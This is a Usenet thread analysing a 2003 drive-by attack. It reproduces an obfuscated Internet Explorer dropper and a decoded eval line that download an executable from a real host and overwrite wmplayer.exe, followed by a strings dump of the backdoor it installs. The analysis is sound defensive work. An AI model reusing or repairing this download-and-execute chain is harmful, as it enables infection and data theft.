<script type="text/javascript">
/**
 * Encode every UTF-16 code unit of `s` as a literal "\uXXXX" escape (six
 * characters: backslash, "u", four lower-case hex digits, zero-padded) and
 * return the concatenation. The empty string encodes to "".
 *
 * NOTE(review): this is the obfuscation encoder whose output format matches
 * the escaped payload passed to document.write() further down; nothing on
 * this page calls it, so it was apparently left in by the author of the
 * dropper. The function itself is harmless.
 *
 * @param {string} s  text to escape
 * @returns {string}  "\uXXXX" sequence, one escape per code unit
 */
function convertString2Unicode(s)
{
    var escapes = [];
    for (var idx = 0; idx < s.length; idx++)
    {
        // toString(16) yields 1-4 hex digits for a code unit; prefixing
        // "000" and keeping the last four characters zero-pads it.
        var hex = s.charCodeAt(idx).toString(16);
        escapes.push("\\u" + ("000" + hex).slice(-4));
    }
    return escapes.join("");
}
<script type="text/javascript">
/**
 * Return `s` with each UTF-16 code unit rewritten as a "\uXXXX" escape
 * (four lower-case, zero-padded hex digits). "" yields "".
 *
 * NOTE(review): this is a verbatim duplicate of the definition above - the
 * post appears to have been pasted twice, and the first <script> tag is never
 * closed - so the listing is not well-formed as posted. A later declaration
 * with the same name simply replaces the earlier one. The function is not
 * called anywhere on this page; it is the encoder, not the payload.
 *
 * @param {string} s  text to escape
 * @returns {string}  concatenated escapes
 */
function convertString2Unicode(s)
{
    var encoded = "";
    var count = s.length;
    for (var i = 0; i < count; ++i)
    {
        var hex = s.charCodeAt(i).toString(16);
        // left-pad to exactly four hex digits
        while (hex.length < 4)
        {
            hex = "0" + hex;
        }
        encoded += "\\u" + hex;
    }
    return encoded;
}
// NOTE(review): obfuscated IE dropper, reproduced exactly as posted. The
// newsreader line-wrapped the string literal (sometimes in the middle of a
// \uXXXX escape), so this is NOT valid JavaScript as-is - do not "repair"
// and run it. Decoding the escapes gives HTML that document.write() injects:
//
//   1. <textarea id="code" style="display:none;"> holding a script that
//      fetches hxxp://www.lhconline[.]net/js/mmc.exe via
//      new ActiveXObject("Microsoft.XMLHTTP") (x.Open("GET", ..., 0); x.Send()),
//      then writes x.responseBody through new ActiveXObject("ADODB.Stream")
//      with s.Mode = 3, s.Type = 1 and s.SaveToFile(path, 2) - per the ADO
//      docs: read/write, binary, create-or-overwrite - over
//      C:\Program Files\Windows Media Player\wmplayer.exe, and finally sets
//      location.href = "mms://" (presumably so the mms: protocol handler
//      launches the just-overwritten wmplayer.exe).
//
//   2. <script language="javascript"> defining preparecode(code), which
//      splits the textarea text on \r\n, trims each line, escapes ' and \,
//      rewrites every "/" as "%2f", drops empty lines and re-joins with a
//      literal "\r\n"; and doit(), which reads document.all.code.value,
//      builds "file:javascript:eval('" + code + "')" and calls
//      window.open(myURL, "_media"). setTimeout("doit()", 5000) fires it
//      five seconds after the page loads.
//
// NOTE(review): opening a file:javascript: URL in IE's "_media" (Media Bar)
// target was a known 2003 cross-zone technique; presumably that is what lets
// the XMLHTTP/ADODB.Stream calls run silently instead of prompting - not
// verified here. The unused convertString2Unicode() above matches the
// escape format and is apparently the tool that produced this blob.
document.write('\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020
\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u00
79\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u
006e\u006f\u006e\u0065\u003b\u0022\u003e\u000d\u000a\u000d\u000a\u0020\u0020
\u0020\u0020\u0076\u0061\u0072\u0020\u0078\u0020\u003d\u0020\u006e\u0065\u00
77\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u
0063\u0074\u0028\u0022\u004d\u0069\u0063\u0072\u006f\u0073\u006f\u0066\u0074
\u002e\u0058\u004d\u004c\u0048\u0054\u0054\u0050\u0022\u0029\u003b\u0020\u00
0d\u000a\u0020\u0020\u0020\u0020\u0078\u002e\u004f\u0070\u0065\u006e\u0028\u
0022\u0047\u0045\u0054\u0022\u002c\u0020\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u0077\u0077\u0077\u002e\u006c\u0068\u0063\u006f\u006e\u006c\u00
69\u006e\u0065\u002e\u006e\u0065\u0074\u002f\u006a\u0073\u002f\u006d\u006d\u
0063\u002e\u0065\u0078\u0065\u0022\u002c\u0030\u0029\u003b\u0020\u000d\u000a
\u0020\u0020\u0020\u0020\u0078\u002e\u0053\u0065\u006e\u0064\u0028\u0029\u00
3b\u0020\u000d\u000a\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020\u0020\u
0020\u0076\u0061\u0072\u0020\u0073\u0020\u003d\u0020\u006e\u0065\u0077\u0020
\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u00
74\u0028\u0022\u0041\u0044\u004f\u0044\u0042\u002e\u0053\u0074\u0072\u0065\u
0061\u006d\u0022\u0029\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0073\u002e
\u004d\u006f\u0064\u0065\u0020\u003d\u0020\u0033\u003b\u000d\u000a\u0020\u00
20\u0020\u0020\u0073\u002e\u0054\u0079\u0070\u0065\u0020\u003d\u0020\u0031\u
003b\u000d\u000a\u0020\u0020\u0020\u0020\u0073\u002e\u004f\u0070\u0065\u006e
\u0028\u0029\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0073\u002e\u0057\u00
72\u0069\u0074\u0065\u0028\u0078\u002e\u0072\u0065\u0073\u0070\u006f\u006e\u
0073\u0065\u0042\u006f\u0064\u0079\u0029\u003b\u000d\u000a\u000d\u000a\u0020
\u0020\u0020\u0020\u0073\u002e\u0053\u0061\u0076\u0065\u0054\u006f\u0046\u00
69\u006c\u0065\u0028\u0022\u0043\u003a\u005c\u005c\u0050\u0072\u006f\u0067\u
0072\u0061\u006d\u0020\u0046\u0069\u006c\u0065\u0073\u005c\u005c\u0057\u0069
\u006e\u0064\u006f\u0077\u0073\u0020\u004d\u0065\u0064\u0069\u0061\u0020\u00
50\u006c\u0061\u0079\u0065\u0072\u005c\u005c\u0077\u006d\u0070\u006c\u0061\u
0079\u0065\u0072\u002e\u0065\u0078\u0065\u0022\u002c\u0032\u0029\u003b\u000d
\u000a\u0020\u0020\u0020\u0020\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u00
6e\u002e\u0068\u0072\u0065\u0066\u0020\u003d\u0020\u0022\u006d\u006d\u0073\u
003a\u002f\u002f\u0022\u003b\u000d\u000a\u000d\u000a\u003c\u002f\u0074\u0065
\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u00
73\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u
0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070
\u0074\u0022\u003e\u000d\u000a\u000d\u000a\u0020\u0020\u0020\u0020\u0066\u00
75\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0070\u0072\u0065\u0070\u0061\u
0072\u0065\u0063\u006f\u0064\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0020
\u007b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u00
65\u0073\u0075\u006c\u0074\u0020\u003d\u0020\u0027\u0027\u003b\u000d\u000a\u
0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0069\u006e\u0065\u0073
\u0020\u003d\u0020\u0063\u006f\u0064\u0065\u002e\u0073\u0070\u006c\u0069\u00
74\u0028\u002f\u005c\u0072\u005c\u006e\u002f\u0029\u003b\u000d\u000a\u0020\u
0020\u0020\u0020\u0020\u0020\u0020\u0020\u0066\u006f\u0072\u0020\u0028\u0069
\u003d\u0030\u003b\u0069\u003c\u006c\u0069\u006e\u0065\u0073\u002e\u006c\u00
65\u006e\u0067\u0074\u0068\u003b\u0069\u002b\u002b\u0029\u0020\u007b\u000d\u
000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0069\u00
6e\u0065\u0020\u003d\u0020\u006c\u0069\u006e\u0065\u0073\u005b\u0069\u005d\u
003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
\u0020\u0020\u006c\u0069\u006e\u0065\u0020\u003d\u0020\u006c\u0069\u006e\u00
65\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005e\u005c\u
0073\u002b\u002f\u002c\u0022\u0022\u0029\u003b\u000d\u000a\u0020\u0020\u0020
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0069\u006e\u00
65\u0020\u003d\u0020\u006c\u0069\u006e\u0065\u002e\u0072\u0065\u0070\u006c\u
0061\u0063\u0065\u0028\u002f\u005c\u0073\u002b\u0024\u002f\u002c\u0022\u0022
\u0029\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u00
20\u0020\u0020\u0020\u006c\u0069\u006e\u0065\u0020\u003d\u0020\u006c\u0069\u
006e\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u0027
\u002f\u0067\u002c\u0022\u005c\u005c\u0027\u0022\u0029\u003b\u000d\u000a\u00
20\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u
0069\u006e\u0065\u0020\u003d\u0020\u006c\u0069\u006e\u0065\u002e\u0072\u0065
\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005b\u005c\u005c\u005d\u002f\u00
67\u002c\u0022\u005c\u005c\u005c\u005c\u0022\u0029\u003b\u000d\u000a\u0020\u
0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0069
\u006e\u0065\u0020\u003d\u0020\u006c\u0069\u006e\u0065\u002e\u0072\u0065\u00
70\u006c\u0061\u0063\u0065\u0028\u002f\u005b\u002f\u005d\u002f\u0067\u002c\u
0022\u0025\u0032\u0066\u0022\u0029\u003b\u000d\u000a\u000d\u000a\u0020\u0020
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u00
20\u0028\u006c\u0069\u006e\u0065\u0020\u0021\u003d\u0020\u0027\u0027\u0029\u
0020\u007b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0073\u0075\u006c\u00
74\u0020\u002b\u003d\u0020\u006c\u0069\u006e\u0065\u0020\u002b\u0027\u005c\u
005c\u0072\u005c\u005c\u006e\u0027\u003b\u000d\u000a\u0020\u0020\u0020\u0020
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000d\u000a\u0020\u00
20\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000d\u000a\u0020\u0020\u0020\u
0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0072
\u0065\u0073\u0075\u006c\u0074\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u00
7d\u000d\u000a\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020\u0020\u0020\u
0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0064\u006f\u0069\u0074
\u0028\u0029\u0020\u007b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u00
20\u0020\u006d\u0079\u0063\u006f\u0064\u0065\u0020\u003d\u0020\u0070\u0072\u
0065\u0070\u0061\u0072\u0065\u0063\u006f\u0064\u0065\u0028\u0064\u006f\u0063
\u0075\u006d\u0065\u006e\u0074\u002e\u0061\u006c\u006c\u002e\u0063\u006f\u00
64\u0065\u002e\u0076\u0061\u006c\u0075\u0065\u0029\u003b\u000d\u000a\u0020\u
0020\u0020\u0020\u0020\u0020\u0020\u0020\u006d\u0079\u0055\u0052\u004c\u0020
\u003d\u0020\u0022\u0066\u0069\u006c\u0065\u003a\u006a\u0061\u0076\u0061\u00
73\u0063\u0072\u0069\u0070\u0074\u003a\u0065\u0076\u0061\u006c\u0028\u0027\u
0022\u0020\u002b\u0020\u006d\u0079\u0063\u006f\u0064\u0065\u0020\u002b\u0020
\u0022\u0027\u0029\u0022\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u0020\u00
20\u0020\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u006f\u0070\u0065\u
006e\u0028\u006d\u0079\u0055\u0052\u004c\u002c\u0022\u005f\u006d\u0065\u0064
\u0069\u0061\u0022\u0029\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020\u00
20\u0020\u007d\u000d\u000a\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u0020\u
0020\u0020\u0073\u0065\u0074\u0054\u0069\u006d\u0065\u006f\u0075\u0074\u0028
\u0022\u0064\u006f\u0069\u0074\u0028\u0029\u0022\u002c\u0020\u0035\u0030\u00
30\u0030\u0029\u003b\u000d\u000a\u0020\u0020\u0020\u0020\u000d\u000a\u0020\u
0020\u0020\u0020\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074
\u003e\u000d\u000a')</script>
It is not a virus but a piece of JavaScript, and I don't use the crystal ball
method anymore.
> I know I was infected with something but can't figure out what it is
yet.
How did you determine this?
Tell us the URL and maybe something will come out.
file://javascript:eval('var x = new
ActiveXObject("Microsoft.XMLHTTP");\r\nx.Open("GET","http:%2f%2fwww.lhconline.net%2fjs%2fmmc.exe",0);\r\nx.Send();\r\nvar s = new ActiveXObject("ADODB.Stream");\r\ns.Mode = 3;\r\ns.Type = 1;\r\ns.Open();\r\ns.Write(x.responseBody);\r\ns.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);\r\nlocation.href = "mms:%2f%2f";\r\n')
So, the virus is actually downloaded from:
http://www.lhconline.net/js/mmc.exe
Can someone help me analyze that exe file to find out what virus it is and
how I can clean it up?
> Can someone help me analyze that exe file to find out what virus it is
and
> how I can clean it up?
Backdoor AMQ http://vil.nai.com/vil/content/v_100037.htm
<snip code>
If it took your ZA and Norton went down have you sent this on to them?
ZA dropping does not surprise me. This makes me think of a new Trojan
making the rounds. It overrides the victim's DNS settings and hijacks their
browser. It forces the browser (IE only) to whatever web page the attacker
wishes. This could be a nasty little surprise waiting on the other end.
Thanks
"Karel" <s...@chello.nl> wrote in message
news:Ddcfb.8384$P51.17213@amstwist00...
"newsgroup" <dontm...@pcconnect.net> wrote in message
news:L6bfb.13363$NX3....@newsread3.news.pas.earthlink.net...
Well, all that hex shit at the top is shellcode (?), so my initial thought would
be some kind of buffer overflow to execute the shellcode, but having said this,
it's a script, so it could just be hidden code that gets decoded and
executed, like you can do in IRC. :P But anyway, I don't know JS so I wouldn't
be the best person to ask; you could try Doc Jeff or someone in an HTML/JS
group (if no one else here knows).
--
Mimic
"Without Knowledge you have fear, With fear you create your own nightmares."
"There are 10 types of people in this world. Those that understand Binary,
and those that dont."
"C makes it easy to shoot yourself in the foot. C++ makes it harder, but
when you do, it blows away your whole leg"
Get a firewall in place to prevent incoming unsolicited packets, and
interdict outgoing packets that you don't authorize.
XP's firewall isn't sufficient--you need a third-party: Kerio, Zone Labs,
Tiny.
"Jibba Jabba" <dontm...@pcconnect.net> wrote in message
news:zCcfb.13385$NX3....@newsread3.news.pas.earthlink.net...
http://www.grisoft.com offers free, updated virus protection for
individuals.
"Jibba Jabba" <dontm...@pcconnect.net> wrote in message
news:zCcfb.13385$NX3....@newsread3.news.pas.earthlink.net...
> It is a trojan from November 2002; do you think your definitions are that
> old? And if so, just update them and nothing will go wrong.
You're wrong. Norton has got lots of problems detecting runtime packed
malware, especially backdoors.
This one is:
Backdoor.Beastdoor.202, upx-runtime packed!
--
Regards, Torti
> How shall I proceed here? I am using Norton Antivirus.
*Although* you've got the newest signature updates, Norton will have
problems detecting such malware (backdoor, *runtime-packed*).
Try a better antivirus that uses the KAV engine.
--
Regards, Torti
> So, the virus is actually downloaded from:
> http://www.lhconline.net/js/mmc.exe
I went to this page using Firebird, and was prompted to decide what to do
with mmc.exe.
If you'd simply had Install On Demand in Internet Explorer turned off, this
wouldn't have happened to you.
Use this little scare to get serious about the security of your computer,
and learn something about it. Obviously, you thought that simply having
Zone Alarm and Norton was enough. It isn't.
Unfortunately, a scare is what it takes for many of us, myself included.
Yep, I've had this same trojan blocked several times trying to connect
through port 666.
I thought shellcode too, but I looked inside and it's got SMTP commands
to a mail server, you know "HELO MAIL FROM:" type stuff.
Here's the readable parts of it, the mmc.exe binary:
> This program must be run under Win32
> UPX0
> UPX1
> .rsrc
> 1.20
> UPX!
> E/ ]
> StringX
> TObject
> |xtp
> lhd2
> XTP
> 2LHD
> R8!;l
> LY9
> = -!
> PRQ:
> =YZX
> .-t+
> _<ar
> (LmWs
> VQA;
> &jhV@
> L5R<
> ^@nI)
> H{Bw
> uX0E
> /w)f%.
> 76nhu=
> t!z#
> F| t
> +//?
> t_$xtZXtU0u
> w%9
> i}q F
> ~ExC[)l
> h#P:[
> *[`
> I)Y`kq
> ~ChA
> 6V,y
> "4yX
> 0{&}C
> mP0T
> '6hd*
> R_]9
> a.w
> ZTUWVSA
> g!9Z
> d$,YH
> ,t\=
> =Ht^`
> r6tm{
> /'=t&
> D&B;
> n `]
> ,Joo
> T-l>
> ZWjQ6
> ^]c^
> !(ZPU
> uXG=
> w>5q
> '#!A
> gC ~)/
> G~$P
> ;?RGW
> MtV|
> CaAZ
> uXJt
> "+8A
> 7t1S
> <##H@
> Xw&J|
> }&Z~")
> 'FR]w~
> Z9PX25
>>l\h:
> l ,n
> A,_i
> @[:G
> 0zV'
> bK< X
> 3CRa}
> C#WZ
> JO8|"G
> ItR!X"'>
> v|/t
> HP)^@_~
> kernel32.dll
> GetLo
> ngPa
> NameA
> kwEx@8@
> C@t(
> p`Vd
> jxtAra
> oftware\Be
> orland\Qcales
> qD}phi"
> s>d\
> s Copyright (V
> c) 19
> ,2003 Ave
> by NhT/j@y
> (;2X{
> CYJ&3
> A|xtd
> d`\A
> dXTP
> LHD@
> A<84d
> 0,( '
> lhd
> 2`\X
> TPLH
> D@<2
> ,($"
> <BoWVj
> G 6:
> B.9,
> eToolh
> 32SnapshotH
> ListFi
> Next
> sMem
> WW[,Y
> Module
> Funcz'
> [;KERNELDLL
> WinSta0
> 8-t/@
> mTV%
> Au.1
> http://w
> mail.
> ;=com
> Log9\Z
> M%#s
> \RAS Aut
> 7|ial\C2t
> a.fr_
> 7aHOuu
> %'Cr`&
> @?r@
> Yv*/$'
> +*oNX
> $'QP
> $%8R
> %-aX
> US W
> qWP
> '$GW
> !$
> e$ $
> %WIK
> < yxW1Y
> (,3D
> ((,(!'L
> J\8D
> 3<88<
> l+yX|
>>h 1
> 4S@Q
> PCc?
> 8tTz
> web.icqy
> OST /scripts
> /WWPMsg? HTTP/1.0
> 3ost: wwp.mirX
> abilisK:8$
> -type+ap@w
> p$ca
> p-form-url#9ded7
> gth94T
> Accepy*/vA
> +Send
> E@#`
> <a&Rp|B
> =~Dt1d
> WbHO`
> CBY,
> ;,o[
> -p$Rq
> tfT2*`]
> ;A0G3
> G nA|
> 0f `1
> gM{ G
> PibA|
> jd#0|
> Vi@eo
> N y_
> ~#3#.b
> if ex
> f qgC%0
> :k[;K`
> lcWVo
> 56wh[
> p@,=_
> x jed
> (rT<>
> B o!D
> C/D
> @XGs
> c%I.3[X
> #irU
> <'a%
> .EX
> %7$P9
> =f+e
> (FOi.@
> b"'YSTEM\Curr
> ASet\o
> Imag%
> c#O-c
> KY9|
> g6#\u
> LyLN
> $'Y8=
> c@ju
> mk,1c
>>A"'{
> 7/C><0
> SD;~W
> dT~P
> ?92.168
> need
> file
> data
> !insuf,ci1 m
> u$! |
> !<xY
> V8wc|7
> *t}ta]
> J] C$-
> SUKP1
> XaC
> AM,u
> 7vyvHp;^|t5
> @*u}
> @JQ)
> 0Jov
> pCDH
> za]&[
> @'VRv
> *PS]Oz
> 0};!
> A P2
> 88D<
> nwKT
> l;ds
> 4$/>:)
> s{4+
> ;CdwpVNf
> d)kT
> QV[9
> %g'8
> w#_}yn
> T,|#WE
> ;wC+
> ns[mST
> ZsUH#
> jgR.
> y&H=
> z-YB
> 4BP*[
> KXlX
> X;KxwV
> {<JBu
> X$`L
> F${d9
> SxsP}
> `+Sh
> &H#-
> \'ppJ)
> z"pu
> 4CK(
> .X :#~
> sSc_d
> D#5&-
> iFDe
> c?|;
> O9 n
> .[st
> #4|0
> [s&6
> m=$r
> rvBb
> eB~
> mG=B)
> ]9 I
> 7knt
> 3s$t^x$
> @j[S
> v$C66;
> {m_P+
> fr fwp
> h(;U
> \>H7X
> ]M`=
> <T~!
> ; ZJN
> F aq
> ,yQ,
> KY|,
> D,${
> *$-}
> Y3JF
> h`]4QC
> 's0.RY
> ];Bu
> =,vo
> NF0W
> 9`TM
> ,2
> +#A)
> DCTV
> wS-YH
> ;C,u)
> R^(t!K7@
> n9 a-
> T>LK
> k;=v
> ;PZR
> ?WK`
> lnU&Z
> TXyaB
> T|ix
> 3TzP
> DP{}nG<RVR
> \Y~B
> C#<84
> `j K
> =DST
> %\B(O+
> 4SKTJS
> j)|~s
> K"pK
> PS8,
> MF\Z
> {Q{D
> g+ t
> "l,B
> ^}u#'
> r6[KK%B!
> [u1S
> BkdQH/
> $3FR(L
> vD'Q
> B0SW
> 4lyr
> :Ds=
> RfI4
> Z}&@#
> }iO(
> &<Hu
> ,e(9(pX
> dpn&*&
> _`' (-6)
> 3)W~
> 2)n A
> \;nd#"_
> # Ex
> d([p]O
> PngE
> InvalidCRC
> NGMis
> bMulp
> IDATH
> ZLIBw
> ette
> Size
> Unknown
> d]NotP
> TPoi
> e]AY
> TChu
> IEND
> gAMA
> PLTE
> tRNS
> r;@FP
> ^IMC
> OZ];
> J`kC
> I8 G
> g pA&
> ?v-|
> /X"Z
> )hQ)
> *Y[$
> Cr9G
> _^d,
> uAUs
> {[X\
> |EfIW
> [X'6
> aAx/
> Xv"o
> t*@.
> {iB9+5
> 2%<wl
> HZD=
> j(-pp
> PV xvB
> DHD:,
> tb@FIu
> xv;K
> \9`]
> EwoPa.
> BAQJs
> ,$MjoQ\
> p!"Ph}W
> 6Bgk
>>O<AM
> 0D =
> }58]
> d<[O
> cFIW7
> {C@0
> V}1\
> wD;VMa
> F4qvt
> vCLPW
> loQ{;
> uC&;
> rbF\=
> d:IC
> fE-@
> rv{B
> J;r,
> $(T/E
> O~,4
> Vz8T
> tid8
> 70U1c
> JB%H
> BC+45
> le/e
> ^;Qd
> R,lK
> @_aI
> WT;
> "~Ho;
> COu$
> *&(*,A
> tSCg
> hTma!
> *sum
> r0G_T
> v,)&PfG
> CN(A
> ?FbT
> \}g#
> ;HEl
> (BQI
> 5H%A
> 3>TG
> bY8@
> ]UaE
> &f%j!M
> h%/W E,E
> cxAv
> YPl-
> 9"`c
> TUDP
> ,,s,,>,Y
> TMxQuery
> TSMT1
> 2l.l
> u |h
> fD-j
> U" My`
> ..O:
> T!hP:6
> 0+E36a
> +1 *
> *Y1o
> $-v2
> W"L>
> %CA;
> !dn0
> ns1.ip
> lus.net0
> &^VQ
> \s)A
> HELO
> AIL FROM:<
> RCPT TO
> }C~DATA#S
> O.;QUIT
> SB``
> 8hd=X
> dH,'l
> #Orv
> (GP,E
> 8C(0
> #DtR
> v@ d{Kb
> g\6XB
> U>d;
> ~<J!
> 2Zdp7
> ~d[<X
> !.x
> o [d
> (dZ!
> D9BC
> VP7Kk
> B A{
> _WhK
> P b44
> d!2@
> ,o2!G
> 08p8$
> YZrHr
> ^KNr2
> fc{ U
> XLX.PIF
> eastyA
> OFTWAREJ
> rdows
> COM
> sag*
> c[uw
> ve=tupj
> `?s\{42AC031}k
> 2-EE51-A3CC
> 40AA
> E6115C}wSHb>
> Run;
> ]`oND
> BuildNumb
> \Bg
> DGor=
>>_HardDe
> pCd\Sy
> emz\
> s".m
> heU_T>
> [\5ma
> Exple
> #.tf_
> Boot:[K]-
> ZkVD
> LL6)0
> _H-0
> =;[M
> xqFVN
> G0G0
> B!Kt*
> $dgp
> uXxT
> D h,
> $z.6
> GJ&0l
> dI9+
> mkc}
> 5,a0fz
> /Xdd"
> $0<kt
> HTkwB
> ay$
> |),RxZH&y
> 78(1
> "J@,
> bQuR
> {UNDO}
> <DEL)
> {F+:
> ;+2
> 2=<,
> _>?
> 2 ~`2
> 2{[|A
> <"'{U-
> $dT^7
> \z @yyv/d
> Z4{M
> 4 ;h{
> HJKz
> T"E^
> 66VS*us0!
> *ip*p|`[A
> GC-`
> "KTT
> h~PU
> 85'6o
> @#8aw
> ,xGx ?)
> ~#1.bmp
> <RE#
> }c+&l
> eyeo
> l!30
> Ap!Fb
> ^m0F
> ?,Fl
> [Hm{
> he'x
> %NdyFx
> dB "8
> x.pif_1
> 7/;h
> p0*-
> hF/@
> )."P
> =:l?
> y8B<l
> x$ia
> }>4,
> uW$"aaYY
> $d$Gw'
> j:e
> b+l(
> !'Mw
> $N
> a3au
> yb4^g
> ;lU pA.
> pw
> Dcd{C
> gddd
> {5{2
> Dv 9
> jzX1
> nY%
> RaoD/&
> set cd
> dio
> Go %C
> hif;
> SPEC7 /C
> +~/>G
> 2$04-
> h8(,hD
> hP_
> %_$h\(hh8ht
> '2.02
> ("C8,
> Oi3Hte
> I<<[
> c=-p
> ,Ld;4
> epgM
> i'tklm4M
> 4nofqhM
> Cvwx@
> 4yWh
> 'nr+
> }7ks
> 7'?e
> ldwz
> flI ,
> 5-2 Jean-l
> oup GvlyB
> 'ceh
> #+3;5
> 4MCSc
> 40@`
> }/#G`<
> ;x8A
> 4S|<
> 3v62
> c~>2
> ,UA]@?
> Mark
> AdlKb
> ub"b
> Pyna
> bi0@
> \X#KlR6{k
> al/#F@G6
> 4M0p
> H(h4M
> 5M4t
> 8@P`p
> okgc_
> {[WSOKG
> }f{B[
> p8,D
> o xy
> symbolsZ
> HX#
> RvdxP
> 4t0]
> 5Md~}
> @RTA
> "kI/
> NyEl
> tuKE,
> p3c5"
> /In/t
> u!)^w
> o!cqn
> a3 (
> #w]r
> u;dlfl
> uEtC
> sgOia
> [eS/B
> FiW:
> sSpU n
> r}'Cw
> ,SuOv
> Cx)l
> yW'p
> ukMw
> !acg#
> {u t
> TYWEa
> &=O8
> pngl
> TlH&%
> B3E@
> Emlu
> NMaA
> 2Uu:.'
> uA AK
> VIExA81
> A.Addr
> fo0LaO
> sH^i
> Wre1
> ha2 d
> E)Of7Rtl:wmk
> DyH?
> Movf
> StdH
> 0Al=c6`g1
> 'Sus
> qWSkBl
> B;Ti
> n[ct
> M_%v
> Cz=b
> UnkK
> G:vs
> abYR
> *Key
> &N_(
>> UA2l
> B60$
> %Ec'
> SV,4
> BjDe
> r UR
> l_a7
> _ev\
> D`Bk0J.H
> Onsl2.|
> h9?#
> pbx1ko{rdD2a
> xco/Is
> XFVC
> o/]uAE
> 26.Dk
> G*GzI
> 1h(N_
> 40mci/F
> WSAC9
> d6CODE
> .idH\
> '@ _
> wwwp
> KERNEL32.DLL
> advapi32.dll
> AVICAP32.DLL
> gdi32.dll
> oleaut32.dll
> URLMON.DLL
> user32.dll
> wininet.dll
> winmm.dll
> wsock32.dll
> LoadLibraryA
> GetProcAddress
> ExitProcess
> RegEnumKeyA
> capCreateCaptureWindowA
> BitBlt
> SysFreeString
> URLDownloadToFileA
> GetDC
> InternetCheckConnectionA
> mciSendStringA
> send
> $TTY
> hetf
> mho_qhk
> h]gk^
> v\eoTqdX
> rQ}d
NetName: Bandx-GNXOnline
band-x.com / GNX Online
London
And no, the newest version of f-prot didn't detect anything, but that
doesn't mean too much, I've seen it find backdoors and I've seen it not.
If that's what this is....
--
--------------nonoffensive sig.v2.2RC2?------------------------
- jayjwa 4 Spammers: mailto: lis...@listme.dsbl.org
The New Atr2. PGP/GPG Keys onsite
"Why do all the noob's use RedHat,
speak 4th grade English,
and cry because their X server crashed?"
Send HTTP1.1 GET to /cgi-bin/ping-jay.cgi, my domain, 2 mail
==Atr2.Ath.Cx: Linux Tough, Powered by Slackware.=============
The script is refering to the following:
http://www.lhconline.net/js/mmc.exe
mmc.exe is in fact: Backdoor AMQ see:
http://vil.nai.com/vil/content/v_100037.htm
I just wondered why my f-prot didn't pick this one up. It has found lots of
backdoors before, so I know it can. This is the new version; I just
downloaded it a few days ago.
What makes you so sure it's this one? It didn't say anything about any
SMTP mail commands, yet you can see them in the file, I have a copy
here. There are a lot of backdoors.
Yeah, I mean the "shellcode" is the code to fetch mmc.exe and run it, or
whatever :P
So? You lost a limb or what? I didn't.
[snip]
> This one is:
> Backdoor.Beastdoor.202, upx-runtime packed!
Here are some strings from the UPX-unpacked binary which may indicate what
it is/does. The "..."s are where I've snipped chunks. The word
"Beasty" is in there, along with what look like persistence keys (an Active
Setup "Installed Components\{...}" StubPath and a \Run value), references to
the SharedAccess service and the SystemRestore\DisableSR value, SMTP
(HELO/MAIL FROM/RCPT TO/DATA) and ICQ WWPMsg.dll notification strings, and an
AVICAP32 capCreateCaptureWindowA import.
...
Portions Copyright (c) 1999,2003 Avenger by NhT
...
http://www.
mail.hotmail.com
LoginSessionDisable
Software\Microsoft\RAS Autodial\Control
microsoft.com
nea.fr
...
web.icq.com
POST /scripts/WWPMsg.dll HTTP/1.0
Host: wwp.mirabilis.com:80
Content-type: application/x-www-form-urlencoded
Content-length: 480
Accept: */*
from=
&fromemail=
&subject=
&body=
&to=
&Send=
...
#3#.bat
del "
if exist "
" goto q
del %0
...
SYSTEM\CurrentControlSet\Services\
ImagePath
.EXE
...
192.168
...
